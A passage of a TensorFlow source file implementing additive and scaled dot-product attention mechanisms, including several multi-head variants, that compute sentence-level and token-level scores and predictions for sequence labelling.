:return attention_weights: 2D floats of shape [B, M] of normalized token_scores
"""
with tf.variable_scope("compute_classic_single_head_attention"):
attention_evidence = tf.layers.dense(
inputs=inputs, units=attention_size,
activation=tf.tanh, kernel_initializer=initializer) # [B, M, attention_size]
attention_weights = tf.layers.dense(
inputs=attention_evidence, units=1,
kernel_initializer=initializer) # [B, M, 1]
attention_weights = tf.squeeze(attention_weights, axis=-1) # [B, M]
# Obtain the un-normalized attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_weights)
elif attention_activation == "sharp":
attention_weights = tf.exp(attention_weights)
elif attention_activation == "linear":
attention_weights = attention_weights
else:
raise ValueError("Unknown/unsupported attention activation: %s"
% attention_activation)
attention_weights = tf.where(
tf.sequence_mask(sentence_lengths),
attention_weights, tf.zeros_like(attention_weights))
token_scores = attention_weights # [B, M]
# Obtain the normalized attention weights (they will also be sentence weights).
attention_weights = attention_weights / tf.reduce_sum(
attention_weights, axis=1, keep_dims=True) # [B, M]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, M, num_units]
processed_tensor = tf.reduce_sum(product, axis=1) # [B, E]
if hidden_units > 0:
processed_tensor = tf.layers.dense(
inputs=processed_tensor, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B, hidden_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=1,
activation=tf.sigmoid, kernel_initializer=initializer,
name="output_sent_single_head_ff") # [B, 1]
sentence_scores = tf.squeeze(sentence_scores, axis=-1)
return sentence_scores, token_scores, attention_weights
def compute_scores_from_scaled_dot_product_attention(
inputs,
initializer,
attention_activation,
sentence_lengths,
token_scoring_method):
"""
Computes token and sentence scores from a single-head scaled dot product attention mechanism.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best with Glorot or Xavier)
:param attention_activation: type of attention activation: sharp (exp) or soft (sigmoid)
:param sentence_lengths: 2D ints of shape [B, M]
:param token_scoring_method: can be either max, sum or avg
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return token_scores: 2D floats of shape [B, M]
:return token_probabilities: 2D floats of shape [B, M] of normalized token_scores
"""
with tf.variable_scope("compute_transformer_single_head_attention"):
num_units = inputs.get_shape().as_list()[-1]
# Project to get the queries, keys, and values, all of them of shape [B, M, num_units].
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer)
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer)
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
# Scaled dot-product attention.
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Obtain the un-normalized attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.exp(attention_evidence_masked)
else:
raise ValueError("Unknown/unsupported activation for attention: %s"
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True) # [B, M, M]
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# Obtain the token scores from the attention weights.
# The token_scores below will have shape [B, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(
attention_weights_unnormalized, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores_normalized = division_masking(
inputs=token_scores, axis=-1,
multiplies=[1, tf.shape(token_scores)[1]]) # [B, M]
# Sentence scores as a weighted sum between the inputs and the attention weights.
# weighted_sum_representation = tf.matmul(attention_weights, inputs)
weighted_sum_representation = inputs * tf.expand_dims(
token_scores_normalized, axis=-1) # [B, M, num_units]
processed_tensor = tf.reduce_sum(
weighted_sum_representation, axis=1) # [B, num_units]
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=1,
activation=tf.sigmoid, kernel_initializer=initializer,
name="sentence_scores_from_scaled_dot_product_ff") # [B, 1]
sentence_scores = tf.squeeze(sentence_scores, axis=-1) # [B]
return sentence_scores, token_scores, attention_weights
def single_head_attention_multiple_transformations(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
sentence_lengths,
token_scoring_method,
scoring_activation=None,
how_to_compute_attention="dot",
separate_heads=True):
"""
Computes token and sentence scores using a single-head attention mechanism,
which can either be additive (mainly inspired by the single-head binary-label
method above, as in Rei and Sogaard paper https://arxiv.org/pdf/1811.05949.pdf)
or a scaled-dot product version (inspired by the transformer, but with just one head).
Then, use these scores to obtain predictions at both granularities.
:param inputs: 3D floats of shape [B, M, E]
:param initializer: type of initializer (best if Glorot or Xavier)
:param attention_activation
:param num_sentence_labels: number of unique sentence labels
:param num_heads: number of unique token labels
:param sentence_lengths: the true sentence lengths, used for masking
:param token_scoring_method
:param scoring_activation: activation used for scoring, default is None.
:param how_to_compute_attention: compute attention in the classic way (Marek) or as in transformer
:param separate_heads: boolean value; when set to False, all heads
are used to obtain the sentence scores; when set to True, the default and non-default heads
from the token scores are used to obtain the sentence scores.
:return sentence_scores: 2D floats of shape [B, num_sentence_labels]
:return sentence_predictions: predicted labels for each sentence in the batch; ints of shape [B]
:return token_scores: 3D floats of shape [B, M, num_heads]
:return token_predictions: predicted labels for each token in each sentence; ints of shape [B, M]
"""
with tf.variable_scope("transformer_single_heads_multi_attention"):
token_scores_per_head = []
sentence_scores_per_head = []
attention_weights_per_head = []
for i in range(num_heads):
with tf.variable_scope("num_head_{}".format(i), reuse=tf.AUTO_REUSE):
if how_to_compute_attention == "additive":
sentence_scores_head_i, token_scores_head_i, attention_weights_head_i = \
compute_scores_from_additive_attention(
inputs=inputs, initializer=initializer,
attention_activation=attention_activation,
sentence_lengths=sentence_lengths)
elif how_to_compute_attention == "dot":
sentence_scores_head_i, token_scores_head_i, attention_weights_head_i = \
compute_scores_from_scaled_dot_product_attention(
inputs=inputs, initializer=initializer,
attention_activation=attention_activation,
sentence_lengths=sentence_lengths,
token_scoring_method=token_scoring_method)
else:
raise ValueError("Unknown/unsupported way of computing the attention: %s"
% how_to_compute_attention)
sentence_scores_per_head.append(sentence_scores_head_i)
token_scores_per_head.append(token_scores_head_i)
attention_weights_per_head.append(attention_weights_head_i)
sentence_scores = tf.stack(sentence_scores_per_head, axis=-1) # [B, num_heads]
if separate_heads:
sentence_default_score = tf.layers.dense(
inputs=tf.expand_dims(sentence_scores[:, 0], axis=-1), units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="ff_non_default_sentence_scores")
sentence_non_default_scores = tf.layers.dense(
inputs=sentence_scores[:, 1:], units=num_sentence_labels-1,
activation=scoring_activation, kernel_initializer=initializer,
name="ff_default_sentence_scores")
sentence_scores = tf.concat(
[sentence_default_score, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation")
else:
sentence_scores = tf.layers.dense(
inputs=sentence_scores, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="ff_sentence_scores") # [B, num_sentence_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
token_scores = tf.stack(token_scores_per_head, axis=-1) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores, axis=-1) # [B, M, num_heads]
token_predictions = tf.argmax(token_probabilities, axis=-1) # [B, M]
# Will be of shape [B, M, H] if an additive attention was used, or
# of shape [B, M, M, H] if a scaled-dot product attention was used.
attention_weights = tf.stack(attention_weights_per_head, axis=-1)
return sentence_scores, sentence_predictions, token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def variant_1(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
token_scoring_method="max",
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 1 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_1"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# [B*num_heads, M, num_units/num_heads]
if use_inputs_instead_values:
product = tf.matmul(attention_weights, inputs)
else:
product = tf.matmul(attention_weights, values)
product = tf.reduce_sum(product, axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from attention weights. Shape is [B*num_heads, M].
if token_scoring_method == "sum":
token_scores = tf.reduce_sum(attention_weights_unnormalized, axis=1)
elif token_scoring_method == "max":
token_scores = tf.reduce_max(attention_weights_unnormalized, axis=1)
elif token_scoring_method == "avg":
token_scores = tf.reduce_mean(attention_weights_unnormalized, axis=1)
elif token_scoring_method == "logsumexp":
token_scores = tf.reduce_logsumexp(attention_weights_unnormalized, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
token_scores = tf.expand_dims(token_scores, axis=2) # [B*num_heads, M, 1]
token_scores = tf.concat(
tf.split(token_scores, num_heads), axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def variant_2(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 2 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_2"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# [B*num_heads, 1, num_units/num_heads]
queries = tf.reduce_sum(queries, axis=1, keep_dims=True)
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, 1, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = attention_weights
# Normalize attention weights.
attention_weights /= tf.reduce_sum(
attention_weights, axis=-1, keep_dims=True)
# Mask rows (with values of 0), based on columns that have 0 sum.
attention_weights = mask(
attention_weights, queries, keys, mask_type="query")
attention_weights_unnormalized = mask(
attention_weights_unnormalized, queries, keys, mask_type="query")
# Transpose attention weights.
attention_weights = tf.transpose(
attention_weights, [0, 2, 1]) # [B*num_heads, M, 1]
# [B*num_heads, M, num_units/num_heads]
if use_inputs_instead_values:
product = inputs * attention_weights
else:
product = values * attention_weights
product = tf.reduce_sum(product, axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
# Obtain token scores from attention weights.
token_scores = tf.transpose(
attention_weights_unnormalized, [0, 2, 1]) # [num_heads*B, M, 1]
token_scores = tf.concat(
tf.split(token_scores, num_heads), axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
attention_weights = tf.concat(
tf.split(tf.transpose(attention_weights, [0, 2, 1]), num_heads),
axis=-1) # [B, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def variant_3(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
attention_size,
sentence_lengths,
scoring_activation=None,
separate_heads=True):
"""
Variant 3 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_3"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Trainable parameters
w_omega = tf.Variable(
tf.random_normal([num_heads, num_units, attention_size],
stddev=0.1)) # [num_heads, num_units, A]
b_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))
u_omega = tf.Variable(tf.random_normal([attention_size], stddev=0.1))
# Computing the attention score, of shape [B, M, H, A].
attention_evidence = tf.tanh(tf.tensordot(inputs, w_omega, axes=[[2], [1]]) + b_omega)
attention_evidence = tf.tensordot(
attention_evidence, u_omega, axes=[[-1], [0]],
name='attention_evidence_score') # [B, M, H]
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights_unnormalized = tf.nn.sigmoid(attention_evidence)
elif attention_activation == "sharp":
attention_weights_unnormalized = tf.math.exp(attention_evidence)
elif attention_activation == "linear":
attention_weights_unnormalized = attention_evidence
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
tiled_sentence_lengths = tf.tile(
input=tf.expand_dims(
tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_heads])
attention_weights_unnormalized = tf.where(
tiled_sentence_lengths,
attention_weights_unnormalized,
tf.zeros_like(attention_weights_unnormalized))
attention_weights = attention_weights_unnormalized / tf.reduce_sum(
attention_weights_unnormalized, axis=1, keep_dims=True) # [B, M, H]
# Prepare alphas and input.
attention_weights = tf.transpose(attention_weights, [0, 2, 1]) # [B, H, M, 1]
inputs = tf.tile(
input=tf.expand_dims(inputs, axis=1),
multiples=[1, num_heads, 1, 1]) # [B, H, M, E]
product = inputs * tf.expand_dims(attention_weights, axis=-1) # [B, H, M, E]
output = tf.reduce_sum(product, axis=2) # [B, H, E]
processed_tensor = tf.squeeze(tf.layers.dense(
inputs=output, units=1,
kernel_initializer=initializer), axis=-1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
token_scores = attention_weights_unnormalized # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def variant_4(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
token_scoring_method="max",
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 4 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_4"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
keys = tf.where(multiplication_mask, keys, tf.zeros_like(keys))
values = tf.where(multiplication_mask, values, tf.zeros_like(values))
# Split and concat as many projections as the number of heads.
queries = tf.concat(
tf.split(queries, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
keys = tf.concat(
tf.split(keys, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
values = tf.concat(
tf.split(values, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
inputs = tf.concat(
tf.split(inputs, num_heads, axis=2),
axis=0) # [B*num_heads, M, num_units/num_heads]
# Transpose multiplication and scale
attention_evidence = tf.matmul(
queries, tf.transpose(keys, [0, 2, 1])) # [B*num_heads, M, M]
attention_evidence = tf.math.divide(
attention_evidence, tf.constant(num_units ** 0.5))
# Mask columns (with values of -infinity), based on rows that have 0 sum.
attention_evidence_masked = mask(
attention_evidence, queries, keys, mask_type="key")
# Apply a non-linear layer to obtain (un-normalized) attention weights.
if attention_activation == "soft":
attention_weights_unnormalized = tf.nn.sigmoid(attention_evidence_masked)
elif attention_activation == "sharp":
attention_weights_unnormalized = tf.math.exp(attention_evidence_masked)
elif attention_activation == "linear":
attention_weights_unnormalized = attention_evidence_masked
else:
raise ValueError("Unknown/unsupported attention activation: %s."
% attention_activation)
attention_weights_unnormalized = mask( # [B*num_heads, M, M]
attention_weights_unnormalized, queries, keys, mask_type="query")
# Obtain token scores from attention weights. Shape is [B*num_heads, M].
if token_scoring_method == "sum":
attention_weights_unnormalized = tf.reduce_sum(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "max":
attention_weights_unnormalized = tf.reduce_max(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "avg":
attention_weights_unnormalized = tf.reduce_mean(
attention_weights_unnormalized, axis=1)
elif token_scoring_method == "logsumexp":
attention_weights_unnormalized = tf.reduce_logsumexp(
attention_weights_unnormalized, axis=1)
else:
raise ValueError("Unknown/unsupported token scoring method: %s"
% token_scoring_method)
# Normalize to obtain attention weights.
attention_weights = attention_weights_unnormalized / tf.reduce_sum(
attention_weights_unnormalized, axis=1, keep_dims=True)
token_scores = tf.concat(
tf.split(tf.expand_dims(attention_weights_unnormalized, axis=2), num_heads),
axis=2) # [B, M, num_heads]
token_probabilities = tf.nn.softmax(token_scores)
token_predictions = tf.argmax(
token_probabilities, axis=2, output_type=tf.int32) # [B, M]
if use_inputs_instead_values:
product = tf.reduce_sum(inputs * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
else:
product = tf.reduce_sum(values * tf.expand_dims(attention_weights, axis=-1),
axis=1) # [B*num_heads, num_units/num_heads]
product = tf.layers.dense(
inputs=product, units=hidden_units,
activation=tf.tanh, kernel_initializer=initializer) # [B*num_heads, hidden_units]
processed_tensor = tf.layers.dense(
inputs=product, units=1,
kernel_initializer=initializer) # [B*num_heads, 1]
processed_tensor = tf.concat(
tf.split(processed_tensor, num_heads), axis=1) # [B, num_heads]
if separate_heads:
if num_sentence_labels == num_heads:
sentence_scores = processed_tensor
else:
# Get the sentence representations corresponding to the default head.
default_head = tf.gather(
processed_tensor,
indices=[0], axis=-1) # [B, 1]
# Get the sentence representations corresponding to the non-default head.
non_default_heads = tf.gather(
processed_tensor,
indices=list(range(1, num_heads)), axis=-1) # [B, num_heads-1]
# Project onto one unit, corresponding to the default sentence label score.
sentence_default_scores = tf.layers.dense(
default_head, units=1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_default_scores_ff") # [B, 1]
# Project onto (num_sentence_labels-1) units, corresponding to
# the non-default sentence label scores.
sentence_non_default_scores = tf.layers.dense(
non_default_heads, units=num_sentence_labels - 1,
activation=scoring_activation, kernel_initializer=initializer,
name="sentence_non_default_scores_ff") # [B, num_sentence_labels-1]
sentence_scores = tf.concat(
[sentence_default_scores, sentence_non_default_scores],
axis=-1, name="sentence_scores_concatenation") # [B, num_sent_labels]
else:
sentence_scores = tf.layers.dense(
inputs=processed_tensor, units=num_sentence_labels,
activation=scoring_activation, kernel_initializer=initializer,
name="output_sent_specified_scores_ff") # [B, num_sent_labels]
sentence_probabilities = tf.nn.softmax(sentence_scores)
sentence_predictions = tf.argmax(sentence_probabilities, axis=1) # [B]
attention_weights = tf.concat(
tf.split(tf.expand_dims(attention_weights, axis=-1), num_heads),
axis=-1) # [B, M, num_heads]
return sentence_scores, sentence_predictions, \
token_scores, token_predictions, \
token_probabilities, sentence_probabilities, attention_weights
def variant_5(
inputs,
initializer,
attention_activation,
num_sentence_labels,
num_heads,
hidden_units,
sentence_lengths,
scoring_activation=None,
token_scoring_method="max",
use_inputs_instead_values=False,
separate_heads=True):
"""
Variant 5 of the multi-head attention to obtain sentence and token scores and predictions.
"""
with tf.variable_scope("variant_5"):
num_units = inputs.get_shape().as_list()[-1]
if num_units % num_heads != 0:
num_units = ceil(num_units / num_heads) * num_heads
inputs = tf.layers.dense(inputs, num_units) # [B, M, num_units]
# Project to get the queries, keys, and values.
queries = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
keys = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
values = tf.layers.dense(
inputs, num_units, activation=tf.tanh,
kernel_initializer=initializer) # [B, M, num_units]
# Mask out the keys, queries and values: replace with 0 all the token
# positions between the true and the maximum sentence length.
multiplication_mask = tf.tile(
input=tf.expand_dims(tf.sequence_mask(sentence_lengths), axis=-1),
multiples=[1, 1, num_units]) # [B, M, num_units]
queries = tf.where(multiplication_mask, queries, tf.zeros_like(queries))
